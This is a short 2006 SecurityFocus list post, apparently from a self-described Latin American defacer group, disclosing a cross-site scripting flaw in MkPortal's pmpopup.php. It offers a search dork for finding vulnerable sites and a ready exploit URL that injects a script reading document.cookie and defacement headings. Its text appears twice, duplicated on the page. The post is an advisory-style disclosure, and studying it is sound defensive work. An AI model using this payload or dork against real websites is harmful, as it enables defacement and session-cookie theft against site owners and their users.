Back to list
|
Post reply
MkPortal Cross Site Scripting (All versions) xSS
Sep 27 2006 08:27PM
vannovax gmail com
#By: HanowarS
#mail: vannovax[at]gmail.com
#Greetz: Nettoxic, _Antrax_, Fr34k, SSH-2, xarnuz
#web: www.div.com.ve and www.c-group.org
#ALL VERSIONS!!
# Latin American Defacers
############################
Dork:
MKPortal M1.1 Rc1 ©2003-2005 All rights reserved
Hilo:
/mkportal/include/pmpopup.php?u1=www.c-group.org&m1=<script>alert(docume
nt.cookie)</script>&m2=<h1>h4x0r3d</h1>&m3=by&m4=<h1>HANOWARS</h1>
Affected File:
pmpopup.php
Example:
http://www.example.com/mkportal/include/pmpopup.php?u1=www.c-group.org&m
1=<script>alert(document.cookie)</script>&m2=<h1>h4x0r3d</h1>&m3=by&m4=<
h1>HANOWARS</h1>
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
#mail: vannovax[at]gmail.com
#Greetz: Nettoxic, _Antrax_, Fr34k, SSH-2, xarnuz
#web: www.div.com.ve and www.c-group.org
#ALL VERSIONS!!
# Latin American Defacers
############################
Dork:
MKPortal M1.1 Rc1 ©2003-2005 All rights reserved
Hilo:
/mkportal/include/pmpopup.php?u1=www.c-group.org&m1=<script>alert(docume
nt.cookie)</script>&m2=<h1>h4x0r3d</h1>&m3=by&m4=<h1>HANOWARS</h1>
Affected File:
pmpopup.php
Example:
http://www.example.com/mkportal/include/pmpopup.php?u1=www.c-group.org&m
1=<script>alert(document.cookie)</script>&m2=<h1>h4x0r3d</h1>&m3=by&m4=<
h1>HANOWARS</h1>
[ reply ]